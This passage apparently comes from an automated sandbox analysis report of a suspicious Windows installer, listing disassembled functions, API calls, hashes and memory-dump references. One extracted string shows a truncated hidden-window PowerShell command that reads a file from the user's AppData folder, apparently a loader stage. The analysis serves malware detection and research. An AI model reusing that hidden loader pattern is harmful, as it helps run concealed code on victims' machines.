        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: FileRead
        • String ID:
        • API String ID: 2738559852-0
        • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
        • Instruction ID: 5673304fef1064f236b213ef723108cd0aff19b739320a24e8caa41491261f20
        • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
        • Instruction Fuzzy Hash: 27E0B63661025ABBDF109F65DC00AAB7B6CFB05260F048436BA55E6190E635E9219AE4
        Function 00405E99 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
        Download Yara Rule
        APIs
        • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00411EEE,0040CED0,00403383,0040CED0,00411EEE,00414ED0,00004000,?,00000000,004031AD,00000004), ref: 00405EAD
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: FileWrite
        • String ID:
        • API String ID: 3934441357-0
        • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
        • Instruction ID: 98d10028cd881ca52753e47c7ca342dd4640a312c7922d7b1eeb81aac27e7924
        • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
        • Instruction Fuzzy Hash: 41E0EC3226065AABDF109F55DC00EEB7F6CEB053A1F048836FD55E2190D631EA62DBE4
        Function 00404322 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
        Download Yara Rule
        APIs
        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: MessageSend
        • String ID:
        • API String ID: 3850602802-0
        • Opcode ID: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
        • Instruction ID: 8a3813f545c22c4fb684de807d70b5cf20617c54f99984af9f55df869fa0abe2
        • Opcode Fuzzy Hash: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
        • Instruction Fuzzy Hash: B2C09B71740700BBDA20DF649D45F5777547764701F1488797741F60E0C674D410D62C
        Function 00403402 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
        Download Yara Rule
        APIs
        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: FilePointer
        • String ID:
        • API String ID: 973152223-0
        • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
        • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
        • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
        • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
        Function 0040430B Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
        Download Yara Rule
        APIs
        • SendMessageW.USER32(00000028,?,00000001,00404137), ref: 00404319
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: MessageSend
        • String ID:
        • API String ID: 3850602802-0
        • Opcode ID: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
        • Instruction ID: 3e0bacd84e958153637e663f6e0df00a268db6e73930f78988907d41dcf2010e
        • Opcode Fuzzy Hash: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
        • Instruction Fuzzy Hash: 32B01235290A00FBDE214B00EE09F457E62F76C701F008478B340240F0CAB300B1DB19
        Function 004042F8 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
        Download Yara Rule
        APIs
        • KiUserCallbackDispatcher.NTDLL(?,004040D0), ref: 00404302
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CallbackDispatcherUser
        • String ID:
        • API String ID: 2492992576-0
        • Opcode ID: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
        • Instruction ID: ea629541fdd2228df96855dc4de4e407fdbb002a66502a1a5a86269346c048a7
        • Opcode Fuzzy Hash: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
        • Instruction Fuzzy Hash: C0A001B6644500ABCE129F90EF49D0ABBB2EBE8742B518579A285900348A364961EB59

        Non-executed Functions

        Function 00404CED Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
        Download Yara Rule
        APIs
        • GetDlgItem.USER32(?,000003F9), ref: 00404D05
        • GetDlgItem.USER32(?,00000408), ref: 00404D10
        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D5A
        • LoadBitmapW.USER32(0000006E), ref: 00404D6D
        • SetWindowLongW.USER32(?,000000FC,004052E5), ref: 00404D86
        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D9A
        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404DAC
        • SendMessageW.USER32(?,00001109,00000002), ref: 00404DC2
        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404DCE
        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404DE0
        • DeleteObject.GDI32(00000000), ref: 00404DE3
        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404E0E
        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404E1A
        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EB0
        • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404EDB
        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EEF
        • GetWindowLongW.USER32(?,000000F0), ref: 00404F1E
        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404F2C
        • ShowWindow.USER32(?,00000005), ref: 00404F3D
        • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040503A
        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040509F
        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004050B4
        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004050D8
        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050F8
        • ImageList_Destroy.COMCTL32(?), ref: 0040510D
        • GlobalFree.KERNEL32(?), ref: 0040511D
        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405196
        • SendMessageW.USER32(?,00001102,?,?), ref: 0040523F
        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040524E
        • InvalidateRect.USER32(?,00000000,00000001), ref: 0040526E
        • ShowWindow.USER32(?,00000000), ref: 004052BC
        • GetDlgItem.USER32(?,000003FE), ref: 004052C7
        • ShowWindow.USER32(00000000), ref: 004052CE
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
        • String ID: $M$N
        • API String ID: 1638840714-813528018
        • Opcode ID: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
        • Instruction ID: fabf201a6726aaeed1f236dd7cd6744ceb795820712aa309ba6ddf90c5850425
        • Opcode Fuzzy Hash: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
        • Instruction Fuzzy Hash: A4027DB0A00209EFDF209F54CD85AAE7BB5FB44314F50817AE610BA2E0D7799E52DF58
        Function 00404771 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
        Download Yara Rule
        APIs
        • GetDlgItem.USER32(?,000003FB), ref: 004047C0
        • SetWindowTextW.USER32(00000000,?), ref: 004047EA
        • SHBrowseForFolderW.SHELL32(?), ref: 0040489B
        • CoTaskMemFree.OLE32(00000000), ref: 004048A6
        • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004048D8
        • lstrcatW.KERNEL32(?,004281E0), ref: 004048E4
        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048F6
          • Part of subcall function 0040593B: GetDlgItemTextW.USER32(?,?,00000400,0040492D), ref: 0040594E
          • Part of subcall function 004064A6: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406509
          • Part of subcall function 004064A6: CharNextW.USER32(?,?,?,00000000), ref: 00406518
          • Part of subcall function 004064A6: CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 0040651D
          • Part of subcall function 004064A6: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406530
        • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 004049B9
        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049D4
          • Part of subcall function 00404B2D: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
          • Part of subcall function 00404B2D: wsprintfW.USER32 ref: 00404BD7
          • Part of subcall function 00404B2D: SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA
        Strings
        • (7B, xrefs: 0040486E
        • powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Bl, xrefs: 0040478A
        • A, xrefs: 00404894
        • C:\Users\user\AppData\Roaming\afdragsordning, xrefs: 004048C1
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
        • String ID: (7B$A$C:\Users\user\AppData\Roaming\afdragsordning$powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Bl
        • API String ID: 2624150263-3228406189
        • Opcode ID: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
        • Instruction ID: 8b4fcc303a4382937c11c1a66aa2d821073b610587f94151fb5846b241658984
        • Opcode Fuzzy Hash: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
        • Instruction Fuzzy Hash: 13A14FF1A00209ABDB11AFA5C941AAF77B8EF84314F10847BF611B62D1D77C8A418F6D
        Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
        Download Yara Rule
        APIs
        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
        Strings
        • C:\Users\user\AppData\Roaming\afdragsordning, xrefs: 004021C3
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CreateInstance
        • String ID: C:\Users\user\AppData\Roaming\afdragsordning
        • API String ID: 542301482-4024115843
        • Opcode ID: 61b713bc69220648ef0ee8d4cb260af03843adae2956f13d344839b2a1627aa1
        • Instruction ID: b00d62d96fbd26c6029c0673ccd5b1c7279e8b7dfa3a64310cdf9804068cc62f
        • Opcode Fuzzy Hash: 61b713bc69220648ef0ee8d4cb260af03843adae2956f13d344839b2a1627aa1
        • Instruction Fuzzy Hash: C5414C71A00219AFCB00EFE4C988A9D7BB5FF48358B20457AF505EB2D1DB799982CB54
        Function 00404473 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON
        Download Yara Rule
        APIs
        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404511
        • GetDlgItem.USER32(?,000003E8), ref: 00404525
        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404542
        • GetSysColor.USER32(?), ref: 00404553
        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404561
        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040456F
        • lstrlenW.KERNEL32(?), ref: 00404574
        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404581
        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404596
        • GetDlgItem.USER32(?,0000040A), ref: 004045EF
        • SendMessageW.USER32(00000000), ref: 004045F6
        • GetDlgItem.USER32(?,000003E8), ref: 00404621
        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404664
        • LoadCursorW.USER32(00000000,00007F02), ref: 00404672
        • SetCursor.USER32(00000000), ref: 00404675
        • ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,00000001), ref: 0040468A
        • LoadCursorW.USER32(00000000,00007F00), ref: 00404696
        • SetCursor.USER32(00000000), ref: 00404699
        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004046C8
        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004046DA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
        • String ID: N$open$C@
        • API String ID: 3615053054-346628716
        • Opcode ID: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
        • Instruction ID: 5d26fd4bbf68afdbde40cdeb5130b050e05e11fe2774b22c09997c19ee455d7e
        • Opcode Fuzzy Hash: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
        • Instruction Fuzzy Hash: 507193B1A00209BFDB109F60DD85E6A7B69FB85344F00843AFA41B62E0D77D9961DF68
        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
        Download Yara Rule
        APIs
        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
        • BeginPaint.USER32(?,?), ref: 00401047
        • GetClientRect.USER32(?,?), ref: 0040105B
        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
        • DeleteObject.GDI32(?), ref: 004010ED
        • CreateFontIndirectW.GDI32(?), ref: 00401105
        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
        • SelectObject.GDI32(00000000,?), ref: 00401140
        • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
        • SelectObject.GDI32(00000000,00000000), ref: 00401160
        • DeleteObject.GDI32(?), ref: 00401165
        • EndPaint.USER32(?,?), ref: 0040116E
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
        • String ID: F
        • API String ID: 941294808-1304234792
        • Opcode ID: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
        • Instruction ID: fbc3582f0be17511ef24b6208279bd62f68a22b1f89f17edcf88e24f0ff4dafb
